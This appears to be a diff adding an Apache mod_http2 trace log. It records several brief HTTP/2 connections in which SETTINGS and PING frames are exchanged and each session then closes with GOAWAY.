+[Thu Aug 06 15:21:23.406723 2026] [http2:debug] [pid 549:tid 580] h2_session.c(635): [client 192.168.65.1:26313] AH03068: h2_session(549-1,BUSY,0): sent FRAME[WINDOW_UPDATE[stream=0, incr=2147418112]], frames=0/2 (r/s)
+[Thu Aug 06 15:21:23.406724 2026] [http2:trace2] [pid 549:tid 580] h2_session.c(1369): [client 192.168.65.1:26313] nghttp2_session_send: 0
+[Thu Aug 06 15:21:23.406732 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(131): [client 192.168.65.1:26313] h2_session(3)-out: heap[28] 
+[Thu Aug 06 15:21:23.406737 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(131): [client 192.168.65.1:26313] h2_session(3)-out: flush 
+[Thu Aug 06 15:21:23.406772 2026] [http2:trace2] [pid 549:tid 580] h2_mplx.c(1206): [client 192.168.65.1:26313] h2_mplx(549-1): enter polling timeout=0
+[Thu Aug 06 15:21:23.406776 2026] [http2:trace2] [pid 549:tid 580] h2_mplx.c(1250): [client 192.168.65.1:26313] h2_mplx(549-1): polling timed out 
+[Thu Aug 06 15:21:23.406777 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(524): [client 192.168.65.1:26313] h2_session(549-1,BUSY,0): session_read start
+[Thu Aug 06 15:21:23.406781 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(506): [client 192.168.65.1:26313] bb_dump(3): c1 in(HEAP[24] HEAP[26])
+[Thu Aug 06 15:21:23.406786 2026] [http2:debug] [pid 549:tid 580] h2_session.c(383): [client 192.168.65.1:26313] AH03066: h2_session(549-1,BUSY,0): recv FRAME[SETTINGS[length=0, stream=0]], frames=0/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:21:23.406788 2026] [http2:trace2] [pid 549:tid 580] h2_session.c(464): [client 192.168.65.1:26313] h2_session(549-1,BUSY,0): SETTINGS, len=0
+[Thu Aug 06 15:21:23.406790 2026] [http2:debug] [pid 549:tid 580] h2_session.c(383): [client 192.168.65.1:26313] AH03066: h2_session(549-1,BUSY,0): recv FRAME[PING[length=8, ack=0, stream=0]], frames=1/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:21:23.406792 2026] [http2:trace2] [pid 549:tid 580] h2_session.c(473): [client 192.168.65.1:26313] h2_session(549-1,BUSY,0): on_frame_rcv PING[length=8, ack=0, stream=0]
+[Thu Aug 06 15:21:23.406794 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(556): [client 192.168.65.1:26313] h2_session(549-1,BUSY,0): session_read done
+[Thu Aug 06 15:21:23.406795 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(366): [client 192.168.65.1:26313] h2_c1_io(3): adding 9 data bytes
+[Thu Aug 06 15:21:23.406797 2026] [http2:debug] [pid 549:tid 580] h2_session.c(635): [client 192.168.65.1:26313] AH03068: h2_session(549-1,BUSY,0): sent FRAME[SETTINGS[ack=1, stream=0]], frames=2/3 (r/s)
+[Thu Aug 06 15:21:23.406799 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(366): [client 192.168.65.1:26313] h2_c1_io(3): adding 17 data bytes
+[Thu Aug 06 15:21:23.406800 2026] [http2:debug] [pid 549:tid 580] h2_session.c(635): [client 192.168.65.1:26313] AH03068: h2_session(549-1,BUSY,0): sent FRAME[PING[length=8, ack=1, stream=0]], frames=2/4 (r/s)
+[Thu Aug 06 15:21:23.406802 2026] [http2:trace2] [pid 549:tid 580] h2_session.c(1369): [client 192.168.65.1:26313] nghttp2_session_send: 0
+[Thu Aug 06 15:21:23.406804 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(131): [client 192.168.65.1:26313] h2_session(3)-out: heap[26] 
+[Thu Aug 06 15:21:23.406813 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(131): [client 192.168.65.1:26313] h2_session(3)-out: flush 
+[Thu Aug 06 15:21:23.406827 2026] [http2:trace2] [pid 549:tid 580] h2_mplx.c(1206): [client 192.168.65.1:26313] h2_mplx(549-1): enter polling timeout=0
+[Thu Aug 06 15:21:23.406830 2026] [http2:trace2] [pid 549:tid 580] h2_mplx.c(1250): [client 192.168.65.1:26313] h2_mplx(549-1): polling timed out 
+[Thu Aug 06 15:21:23.406831 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(524): [client 192.168.65.1:26313] h2_session(549-1,BUSY,0): session_read start
+[Thu Aug 06 15:21:23.406834 2026] [http2:debug] [pid 549:tid 580] h2_session.c(1459): [client 192.168.65.1:26313] AH03078: h2_session(549-1,BUSY,0): transit [BUSY] -- input exhausted, no streams --> [IDLE]
+[Thu Aug 06 15:21:23.406835 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:26313] h2_session(549-1,IDLE,0): session_read done
+[Thu Aug 06 15:21:23.406840 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(524): [client 192.168.65.1:26313] h2_session(549-1,IDLE,0): session_read start
+[Thu Aug 06 15:21:23.406842 2026] [http2:trace2] [pid 549:tid 580] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:26313] h2_session(549-1,IDLE,0): session_read done
+[Thu Aug 06 15:21:23.406843 2026] [http2:debug] [pid 549:tid 580] h2_session.c(1971): [client 192.168.65.1:26313] AH10306: h2_session(549-1,IDLE,0): returning to mpm c1 monitoring
+[Thu Aug 06 15:21:23.407140 2026] [http2:trace1] [pid 549:tid 581] h2_c1.c(246): [client 192.168.65.1:26313] h2_h2, process_conn
+[Thu Aug 06 15:21:23.407172 2026] [http2:trace1] [pid 549:tid 581] h2_c1.c(297): [client 192.168.65.1:26313] process_conn
+[Thu Aug 06 15:21:23.407179 2026] [http2:trace2] [pid 549:tid 581] h2_c1_io.c(524): [client 192.168.65.1:26313] h2_session(549-1,IDLE,0): session_read start
+[Thu Aug 06 15:21:23.407188 2026] [http2:trace2] [pid 549:tid 581] h2_c1_io.c(506): [client 192.168.65.1:26313] bb_dump(4): c1 in(HEAP[9])
+[Thu Aug 06 15:21:23.407193 2026] [http2:debug] [pid 549:tid 581] h2_session.c(383): [client 192.168.65.1:26313] AH03066: h2_session(549-1,IDLE,0): recv FRAME[SETTINGS[ack=1, stream=0]], frames=2/4 (r/s), remote.emitted=0
+[Thu Aug 06 15:21:23.407195 2026] [http2:trace2] [pid 549:tid 581] h2_session.c(464): [client 192.168.65.1:26313] h2_session(549-1,IDLE,0): SETTINGS, len=0
+[Thu Aug 06 15:21:23.407196 2026] [http2:trace2] [pid 549:tid 581] h2_session.c(489): [client 192.168.65.1:26313] h2_session(549-1,IDLE,0): session has 1 idle frames
+[Thu Aug 06 15:21:23.407198 2026] [http2:debug] [pid 549:tid 581] h2_session.c(1459): [client 192.168.65.1:26313] AH03078: h2_session(549-1,IDLE,0): transit [IDLE] -- input read --> [BUSY]
+[Thu Aug 06 15:21:23.407200 2026] [http2:trace1] [pid 549:tid 581] h2_session.c(1474): [client 192.168.65.1:26313] h2_session(549-1,IDLE,0): enter idle
+[Thu Aug 06 15:21:23.407201 2026] [http2:trace2] [pid 549:tid 581] h2_c1_io.c(556): [client 192.168.65.1:26313] h2_session(549-1,BUSY,0): session_read done
+[Thu Aug 06 15:21:23.407203 2026] [http2:trace2] [pid 549:tid 581] h2_mplx.c(1206): [client 192.168.65.1:26313] h2_mplx(549-1): enter polling timeout=0
+[Thu Aug 06 15:21:23.407206 2026] [http2:trace2] [pid 549:tid 581] h2_session.c(1406): [client 192.168.65.1:26313] h2_stream(549-1-0,IDLE): on_input change
+[Thu Aug 06 15:21:23.407208 2026] [http2:trace2] [pid 549:tid 581] h2_c1_io.c(524): [client 192.168.65.1:26313] h2_session(549-1,BUSY,0): session_read start
+[Thu Aug 06 15:21:23.407210 2026] [http2:trace2] [pid 549:tid 581] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:26313] h2_session(549-1,BUSY,0): input gone
+[Thu Aug 06 15:21:23.407212 2026] [http2:debug] [pid 549:tid 581] h2_session.c(1569): [client 192.168.65.1:26313] AH03401: h2_session(549-1,BUSY,0): conn error -> shutdown, remote.emitted=0
+[Thu Aug 06 15:21:23.407214 2026] [http2:trace2] [pid 549:tid 581] h2_c1_io.c(366): [client 192.168.65.1:26313] h2_c1_io(4): adding 17 data bytes
+[Thu Aug 06 15:21:23.407220 2026] [http2:debug] [pid 549:tid 581] h2_session.c(635): [client 192.168.65.1:26313] AH03068: h2_session(549-1,BUSY,0): sent FRAME[GOAWAY[error=0, reason='', last_stream=0]], frames=3/5 (r/s)
+[Thu Aug 06 15:21:23.407231 2026] [http2:trace2] [pid 549:tid 581] h2_c1_io.c(131): [client 192.168.65.1:26313] h2_session(4)-out: heap[17] flush 
+[Thu Aug 06 15:21:23.407250 2026] [http2:debug] [pid 549:tid 581] h2_session.c(848): [client 192.168.65.1:26313] AH03069: h2_session(549-1,BUSY,0): sent GOAWAY, err=0, msg=
+[Thu Aug 06 15:21:23.407253 2026] [http2:debug] [pid 549:tid 581] h2_session.c(1459): [client 192.168.65.1:26313] AH03078: h2_session(549-1,BUSY,0): transit [BUSY] -- local goaway --> [DONE]
+[Thu Aug 06 15:21:23.407254 2026] [http2:trace2] [pid 549:tid 581] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:26313] h2_session(549-1,DONE,0): session_read done
+[Thu Aug 06 15:21:23.407256 2026] [http2:trace2] [pid 549:tid 581] h2_c1_io.c(524): [client 192.168.65.1:26313] h2_session(549-1,DONE,0): session_read start
+[Thu Aug 06 15:21:23.407257 2026] [http2:trace2] [pid 549:tid 581] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:26313] h2_session(549-1,DONE,0): input gone
+[Thu Aug 06 15:21:23.407259 2026] [http2:trace2] [pid 549:tid 581] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:26313] h2_session(549-1,DONE,0): session_read done
+[Thu Aug 06 15:21:23.407261 2026] [http2:debug] [pid 549:tid 581] h2_c1.c(134): (70014)End of file found: [client 192.168.65.1:26313] AH03045: h2_session(549-1,DONE,0): process, closing conn
+[Thu Aug 06 15:21:23.407264 2026] [http2:trace1] [pid 549:tid 581] h2_session.c(2133): [client 192.168.65.1:26313] h2_session(549-1,DONE,0): pre_close
+[Thu Aug 06 15:21:23.407268 2026] [http2:trace1] [pid 549:tid 581] h2_session.c(859): [client 192.168.65.1:26313] h2_session(549-1,DONE,0): pool_cleanup
+[Thu Aug 06 15:21:23.407269 2026] [http2:debug] [pid 549:tid 581] h2_session.c(1459): [client 192.168.65.1:26313] AH03078: h2_session(549-1,DONE,0): transit [DONE] -- pre_close --> [CLEANUP]
+[Thu Aug 06 15:21:23.407271 2026] [http2:trace2] [pid 549:tid 581] h2_mplx.c(502): [client 192.168.65.1:26313] h2_mplx(549-1): start release
+[Thu Aug 06 15:21:23.407272 2026] [http2:trace1] [pid 549:tid 581] h2_mplx.c(518): [client 192.168.65.1:26313] h2_mplx(549-1): release, 0/0/0 streams (total/hold/purge), 0 streams
+[Thu Aug 06 15:21:23.407275 2026] [http2:trace1] [pid 549:tid 581] h2_mplx.c(570): [client 192.168.65.1:26313] h2_mplx(549-1): released
+[Thu Aug 06 15:21:23.407657 2026] [http2:trace1] [pid 549:tid 582] h2_c1.c(246): [client 192.168.65.1:55037] h2_h2, process_conn
+[Thu Aug 06 15:21:23.407672 2026] [http2:trace1] [pid 549:tid 582] h2_c1.c(251): [client 192.168.65.1:55037] h2_h2, process_conn, new connection using protocol 'http/1.1', direct=1, tls acceptable=1
+[Thu Aug 06 15:21:23.407681 2026] [http2:trace1] [pid 549:tid 582] h2_c1.c(281): [client 192.168.65.1:55037] h2_h2, direct mode detected
+[Thu Aug 06 15:21:23.407684 2026] [http2:trace1] [pid 549:tid 582] h2_c1.c(297): [client 192.168.65.1:55037] process_conn
+[Thu Aug 06 15:21:23.407687 2026] [http2:debug] [pid 549:tid 582] h2_stream.c(609): [client 192.168.65.1:55037] AH03082: h2_stream(549-2-0,IDLE): created
+[Thu Aug 06 15:21:23.407746 2026] [http2:debug] [pid 549:tid 582] h2_session.c(1070): [client 192.168.65.1:55037] AH03200: h2_session(549-2,INIT,0): created, max_streams=100, stream_mem=32768, workers_limit=6, workers_max=37, push_diary(type=1,N=256), max_data_frame_len=0, max_stream_errors=8
+[Thu Aug 06 15:21:23.407750 2026] [http2:trace1] [pid 549:tid 582] h2_c1.c(300): [client 192.168.65.1:55037] conn_setup
+[Thu Aug 06 15:21:23.407754 2026] [http2:debug] [pid 549:tid 582] h2_session.c(1170): [client 192.168.65.1:55037] AH03201: h2_session(549-2,INIT,0): start, INITIAL_WINDOW_SIZE=65535, MAX_CONCURRENT_STREAMS=100
+[Thu Aug 06 15:21:23.407757 2026] [http2:debug] [pid 549:tid 582] h2_session.c(1876): [client 192.168.65.1:55037] AH03079: h2_session(549-2,INIT,0): started on 172.17.0.4:80
+[Thu Aug 06 15:21:23.407763 2026] [http2:debug] [pid 549:tid 582] h2_session.c(1459): [client 192.168.65.1:55037] AH03078: h2_session(549-2,INIT,0): transit [INIT] -- init --> [BUSY]
+[Thu Aug 06 15:21:23.407765 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(366): [client 192.168.65.1:55037] h2_c1_io(5): adding 15 data bytes
+[Thu Aug 06 15:21:23.407768 2026] [http2:debug] [pid 549:tid 582] h2_session.c(635): [client 192.168.65.1:55037] AH03068: h2_session(549-2,BUSY,0): sent FRAME[SETTINGS[length=6, stream=0]], frames=0/1 (r/s)
+[Thu Aug 06 15:21:23.407770 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(366): [client 192.168.65.1:55037] h2_c1_io(5): adding 13 data bytes
+[Thu Aug 06 15:21:23.407771 2026] [http2:debug] [pid 549:tid 582] h2_session.c(635): [client 192.168.65.1:55037] AH03068: h2_session(549-2,BUSY,0): sent FRAME[WINDOW_UPDATE[stream=0, incr=2147418112]], frames=0/2 (r/s)
+[Thu Aug 06 15:21:23.407773 2026] [http2:trace2] [pid 549:tid 582] h2_session.c(1369): [client 192.168.65.1:55037] nghttp2_session_send: 0
+[Thu Aug 06 15:21:23.407778 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(131): [client 192.168.65.1:55037] h2_session(5)-out: heap[28] 
+[Thu Aug 06 15:21:23.407782 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(131): [client 192.168.65.1:55037] h2_session(5)-out: flush 
+[Thu Aug 06 15:21:23.407804 2026] [http2:trace2] [pid 549:tid 582] h2_mplx.c(1206): [client 192.168.65.1:55037] h2_mplx(549-2): enter polling timeout=0
+[Thu Aug 06 15:21:23.407808 2026] [http2:trace2] [pid 549:tid 582] h2_mplx.c(1250): [client 192.168.65.1:55037] h2_mplx(549-2): polling timed out 
+[Thu Aug 06 15:21:23.407810 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(524): [client 192.168.65.1:55037] h2_session(549-2,BUSY,0): session_read start
+[Thu Aug 06 15:21:23.407814 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(506): [client 192.168.65.1:55037] bb_dump(5): c1 in(HEAP[24] HEAP[26])
+[Thu Aug 06 15:21:23.407817 2026] [http2:debug] [pid 549:tid 582] h2_session.c(383): [client 192.168.65.1:55037] AH03066: h2_session(549-2,BUSY,0): recv FRAME[SETTINGS[length=0, stream=0]], frames=0/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:21:23.407819 2026] [http2:trace2] [pid 549:tid 582] h2_session.c(464): [client 192.168.65.1:55037] h2_session(549-2,BUSY,0): SETTINGS, len=0
+[Thu Aug 06 15:21:23.407821 2026] [http2:debug] [pid 549:tid 582] h2_session.c(383): [client 192.168.65.1:55037] AH03066: h2_session(549-2,BUSY,0): recv FRAME[PING[length=8, ack=0, stream=0]], frames=1/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:21:23.407823 2026] [http2:trace2] [pid 549:tid 582] h2_session.c(473): [client 192.168.65.1:55037] h2_session(549-2,BUSY,0): on_frame_rcv PING[length=8, ack=0, stream=0]
+[Thu Aug 06 15:21:23.407824 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(556): [client 192.168.65.1:55037] h2_session(549-2,BUSY,0): session_read done
+[Thu Aug 06 15:21:23.407826 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(366): [client 192.168.65.1:55037] h2_c1_io(5): adding 9 data bytes
+[Thu Aug 06 15:21:23.407827 2026] [http2:debug] [pid 549:tid 582] h2_session.c(635): [client 192.168.65.1:55037] AH03068: h2_session(549-2,BUSY,0): sent FRAME[SETTINGS[ack=1, stream=0]], frames=2/3 (r/s)
+[Thu Aug 06 15:21:23.407829 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(366): [client 192.168.65.1:55037] h2_c1_io(5): adding 17 data bytes
+[Thu Aug 06 15:21:23.407830 2026] [http2:debug] [pid 549:tid 582] h2_session.c(635): [client 192.168.65.1:55037] AH03068: h2_session(549-2,BUSY,0): sent FRAME[PING[length=8, ack=1, stream=0]], frames=2/4 (r/s)
+[Thu Aug 06 15:21:23.407832 2026] [http2:trace2] [pid 549:tid 582] h2_session.c(1369): [client 192.168.65.1:55037] nghttp2_session_send: 0
+[Thu Aug 06 15:21:23.407834 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(131): [client 192.168.65.1:55037] h2_session(5)-out: heap[26] 
+[Thu Aug 06 15:21:23.407835 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(131): [client 192.168.65.1:55037] h2_session(5)-out: flush 
+[Thu Aug 06 15:21:23.407844 2026] [http2:trace2] [pid 549:tid 582] h2_mplx.c(1206): [client 192.168.65.1:55037] h2_mplx(549-2): enter polling timeout=0
+[Thu Aug 06 15:21:23.407848 2026] [http2:trace2] [pid 549:tid 582] h2_mplx.c(1250): [client 192.168.65.1:55037] h2_mplx(549-2): polling timed out 
+[Thu Aug 06 15:21:23.407850 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(524): [client 192.168.65.1:55037] h2_session(549-2,BUSY,0): session_read start
+[Thu Aug 06 15:21:23.407852 2026] [http2:debug] [pid 549:tid 582] h2_session.c(1459): [client 192.168.65.1:55037] AH03078: h2_session(549-2,BUSY,0): transit [BUSY] -- input exhausted, no streams --> [IDLE]
+[Thu Aug 06 15:21:23.407854 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:55037] h2_session(549-2,IDLE,0): session_read done
+[Thu Aug 06 15:21:23.407858 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(524): [client 192.168.65.1:55037] h2_session(549-2,IDLE,0): session_read start
+[Thu Aug 06 15:21:23.407859 2026] [http2:trace2] [pid 549:tid 582] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:55037] h2_session(549-2,IDLE,0): session_read done
+[Thu Aug 06 15:21:23.407861 2026] [http2:debug] [pid 549:tid 582] h2_session.c(1971): [client 192.168.65.1:55037] AH10306: h2_session(549-2,IDLE,0): returning to mpm c1 monitoring
+[Thu Aug 06 15:21:23.408121 2026] [http2:trace1] [pid 549:tid 583] h2_c1.c(246): [client 192.168.65.1:55037] h2_h2, process_conn
+[Thu Aug 06 15:21:23.408129 2026] [http2:trace1] [pid 549:tid 583] h2_c1.c(297): [client 192.168.65.1:55037] process_conn
+[Thu Aug 06 15:21:23.408131 2026] [http2:trace2] [pid 549:tid 583] h2_c1_io.c(524): [client 192.168.65.1:55037] h2_session(549-2,IDLE,0): session_read start
+[Thu Aug 06 15:21:23.408139 2026] [http2:trace2] [pid 549:tid 583] h2_c1_io.c(506): [client 192.168.65.1:55037] bb_dump(6): c1 in(HEAP[9])
+[Thu Aug 06 15:21:23.408145 2026] [http2:debug] [pid 549:tid 583] h2_session.c(383): [client 192.168.65.1:55037] AH03066: h2_session(549-2,IDLE,0): recv FRAME[SETTINGS[ack=1, stream=0]], frames=2/4 (r/s), remote.emitted=0
+[Thu Aug 06 15:21:23.408187 2026] [http2:trace2] [pid 549:tid 583] h2_session.c(464): [client 192.168.65.1:55037] h2_session(549-2,IDLE,0): SETTINGS, len=0
+[Thu Aug 06 15:21:23.408189 2026] [http2:trace2] [pid 549:tid 583] h2_session.c(489): [client 192.168.65.1:55037] h2_session(549-2,IDLE,0): session has 1 idle frames
+[Thu Aug 06 15:21:23.408192 2026] [http2:debug] [pid 549:tid 583] h2_session.c(1459): [client 192.168.65.1:55037] AH03078: h2_session(549-2,IDLE,0): transit [IDLE] -- input read --> [BUSY]
+[Thu Aug 06 15:21:23.408194 2026] [http2:trace1] [pid 549:tid 583] h2_session.c(1474): [client 192.168.65.1:55037] h2_session(549-2,IDLE,0): enter idle
+[Thu Aug 06 15:21:23.408196 2026] [http2:trace2] [pid 549:tid 583] h2_c1_io.c(556): [client 192.168.65.1:55037] h2_session(549-2,BUSY,0): session_read done
+[Thu Aug 06 15:21:23.408198 2026] [http2:trace2] [pid 549:tid 583] h2_mplx.c(1206): [client 192.168.65.1:55037] h2_mplx(549-2): enter polling timeout=0
+[Thu Aug 06 15:21:23.408202 2026] [http2:trace2] [pid 549:tid 583] h2_session.c(1406): [client 192.168.65.1:55037] h2_stream(549-2-0,IDLE): on_input change
+[Thu Aug 06 15:21:23.408205 2026] [http2:trace2] [pid 549:tid 583] h2_c1_io.c(524): [client 192.168.65.1:55037] h2_session(549-2,BUSY,0): session_read start
+[Thu Aug 06 15:21:23.408207 2026] [http2:trace2] [pid 549:tid 583] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:55037] h2_session(549-2,BUSY,0): input gone
+[Thu Aug 06 15:21:23.408209 2026] [http2:debug] [pid 549:tid 583] h2_session.c(1569): [client 192.168.65.1:55037] AH03401: h2_session(549-2,BUSY,0): conn error -> shutdown, remote.emitted=0
+[Thu Aug 06 15:21:23.408212 2026] [http2:trace2] [pid 549:tid 583] h2_c1_io.c(366): [client 192.168.65.1:55037] h2_c1_io(6): adding 17 data bytes
+[Thu Aug 06 15:21:23.408214 2026] [http2:debug] [pid 549:tid 583] h2_session.c(635): [client 192.168.65.1:55037] AH03068: h2_session(549-2,BUSY,0): sent FRAME[GOAWAY[error=0, reason='', last_stream=0]], frames=3/5 (r/s)
+[Thu Aug 06 15:21:23.408226 2026] [http2:trace2] [pid 549:tid 583] h2_c1_io.c(131): [client 192.168.65.1:55037] h2_session(6)-out: heap[17] flush 
+[Thu Aug 06 15:21:23.408251 2026] [http2:debug] [pid 549:tid 583] h2_session.c(848): [client 192.168.65.1:55037] AH03069: h2_session(549-2,BUSY,0): sent GOAWAY, err=0, msg=
+[Thu Aug 06 15:21:23.408254 2026] [http2:debug] [pid 549:tid 583] h2_session.c(1459): [client 192.168.65.1:55037] AH03078: h2_session(549-2,BUSY,0): transit [BUSY] -- local goaway --> [DONE]
+[Thu Aug 06 15:21:23.408256 2026] [http2:trace2] [pid 549:tid 583] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:55037] h2_session(549-2,DONE,0): session_read done
+[Thu Aug 06 15:21:23.408259 2026] [http2:trace2] [pid 549:tid 583] h2_c1_io.c(524): [client 192.168.65.1:55037] h2_session(549-2,DONE,0): session_read start
+[Thu Aug 06 15:21:23.408260 2026] [http2:trace2] [pid 549:tid 583] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:55037] h2_session(549-2,DONE,0): input gone
+[Thu Aug 06 15:21:23.408262 2026] [http2:trace2] [pid 549:tid 583] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:55037] h2_session(549-2,DONE,0): session_read done
+[Thu Aug 06 15:21:23.408265 2026] [http2:debug] [pid 549:tid 583] h2_c1.c(134): (70014)End of file found: [client 192.168.65.1:55037] AH03045: h2_session(549-2,DONE,0): process, closing conn
+[Thu Aug 06 15:21:23.408270 2026] [http2:trace1] [pid 549:tid 583] h2_session.c(2133): [client 192.168.65.1:55037] h2_session(549-2,DONE,0): pre_close
+[Thu Aug 06 15:21:23.408274 2026] [http2:trace1] [pid 549:tid 583] h2_session.c(859): [client 192.168.65.1:55037] h2_session(549-2,DONE,0): pool_cleanup
+[Thu Aug 06 15:21:23.408276 2026] [http2:debug] [pid 549:tid 583] h2_session.c(1459): [client 192.168.65.1:55037] AH03078: h2_session(549-2,DONE,0): transit [DONE] -- pre_close --> [CLEANUP]
+[Thu Aug 06 15:21:23.408278 2026] [http2:trace2] [pid 549:tid 583] h2_mplx.c(502): [client 192.168.65.1:55037] h2_mplx(549-2): start release
+[Thu Aug 06 15:21:23.408283 2026] [http2:trace1] [pid 549:tid 583] h2_mplx.c(518): [client 192.168.65.1:55037] h2_mplx(549-2): release, 0/0/0 streams (total/hold/purge), 0 streams
+[Thu Aug 06 15:21:23.408286 2026] [http2:trace1] [pid 549:tid 583] h2_mplx.c(570): [client 192.168.65.1:55037] h2_mplx(549-2): released
+[Thu Aug 06 15:21:23.408594 2026] [http2:trace1] [pid 549:tid 584] h2_c1.c(246): [client 192.168.65.1:16395] h2_h2, process_conn
+[Thu Aug 06 15:21:23.408605 2026] [http2:trace1] [pid 549:tid 584] h2_c1.c(251): [client 192.168.65.1:16395] h2_h2, process_conn, new connection using protocol 'http/1.1', direct=1, tls acceptable=1
+[Thu Aug 06 15:21:23.408612 2026] [http2:trace1] [pid 549:tid 584] h2_c1.c(281): [client 192.168.65.1:16395] h2_h2, direct mode detected
+[Thu Aug 06 15:21:23.408615 2026] [http2:trace1] [pid 549:tid 584] h2_c1.c(297): [client 192.168.65.1:16395] process_conn
+[Thu Aug 06 15:21:23.408617 2026] [http2:debug] [pid 549:tid 584] h2_stream.c(609): [client 192.168.65.1:16395] AH03082: h2_stream(549-3-0,IDLE): created
+[Thu Aug 06 15:21:23.408653 2026] [http2:debug] [pid 549:tid 584] h2_session.c(1070): [client 192.168.65.1:16395] AH03200: h2_session(549-3,INIT,0): created, max_streams=100, stream_mem=32768, workers_limit=6, workers_max=37, push_diary(type=1,N=256), max_data_frame_len=0, max_stream_errors=8
+[Thu Aug 06 15:21:23.408657 2026] [http2:trace1] [pid 549:tid 584] h2_c1.c(300): [client 192.168.65.1:16395] conn_setup
+[Thu Aug 06 15:21:23.408660 2026] [http2:debug] [pid 549:tid 584] h2_session.c(1170): [client 192.168.65.1:16395] AH03201: h2_session(549-3,INIT,0): start, INITIAL_WINDOW_SIZE=65535, MAX_CONCURRENT_STREAMS=100
+[Thu Aug 06 15:21:23.408664 2026] [http2:debug] [pid 549:tid 584] h2_session.c(1876): [client 192.168.65.1:16395] AH03079: h2_session(549-3,INIT,0): started on 172.17.0.4:80
+[Thu Aug 06 15:21:23.408665 2026] [http2:debug] [pid 549:tid 584] h2_session.c(1459): [client 192.168.65.1:16395] AH03078: h2_session(549-3,INIT,0): transit [INIT] -- init --> [BUSY]
+[Thu Aug 06 15:21:23.408672 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(366): [client 192.168.65.1:16395] h2_c1_io(7): adding 15 data bytes
+[Thu Aug 06 15:21:23.408674 2026] [http2:debug] [pid 549:tid 584] h2_session.c(635): [client 192.168.65.1:16395] AH03068: h2_session(549-3,BUSY,0): sent FRAME[SETTINGS[length=6, stream=0]], frames=0/1 (r/s)
+[Thu Aug 06 15:21:23.408677 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(366): [client 192.168.65.1:16395] h2_c1_io(7): adding 13 data bytes
+[Thu Aug 06 15:21:23.408678 2026] [http2:debug] [pid 549:tid 584] h2_session.c(635): [client 192.168.65.1:16395] AH03068: h2_session(549-3,BUSY,0): sent FRAME[WINDOW_UPDATE[stream=0, incr=2147418112]], frames=0/2 (r/s)
+[Thu Aug 06 15:21:23.408681 2026] [http2:trace2] [pid 549:tid 584] h2_session.c(1369): [client 192.168.65.1:16395] nghttp2_session_send: 0
+[Thu Aug 06 15:21:23.408687 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(131): [client 192.168.65.1:16395] h2_session(7)-out: heap[28] 
+[Thu Aug 06 15:21:23.408692 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(131): [client 192.168.65.1:16395] h2_session(7)-out: flush 
+[Thu Aug 06 15:21:23.408712 2026] [http2:trace2] [pid 549:tid 584] h2_mplx.c(1206): [client 192.168.65.1:16395] h2_mplx(549-3): enter polling timeout=0
+[Thu Aug 06 15:21:23.408716 2026] [http2:trace2] [pid 549:tid 584] h2_mplx.c(1250): [client 192.168.65.1:16395] h2_mplx(549-3): polling timed out 
+[Thu Aug 06 15:21:23.408718 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(524): [client 192.168.65.1:16395] h2_session(549-3,BUSY,0): session_read start
+[Thu Aug 06 15:21:23.408722 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(506): [client 192.168.65.1:16395] bb_dump(7): c1 in(HEAP[24] HEAP[26])
+[Thu Aug 06 15:21:23.408726 2026] [http2:debug] [pid 549:tid 584] h2_session.c(383): [client 192.168.65.1:16395] AH03066: h2_session(549-3,BUSY,0): recv FRAME[SETTINGS[length=0, stream=0]], frames=0/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:21:23.408728 2026] [http2:trace2] [pid 549:tid 584] h2_session.c(464): [client 192.168.65.1:16395] h2_session(549-3,BUSY,0): SETTINGS, len=0
+[Thu Aug 06 15:21:23.408730 2026] [http2:debug] [pid 549:tid 584] h2_session.c(383): [client 192.168.65.1:16395] AH03066: h2_session(549-3,BUSY,0): recv FRAME[PING[length=8, ack=0, stream=0]], frames=1/2 (r/s), remote.emitted=0
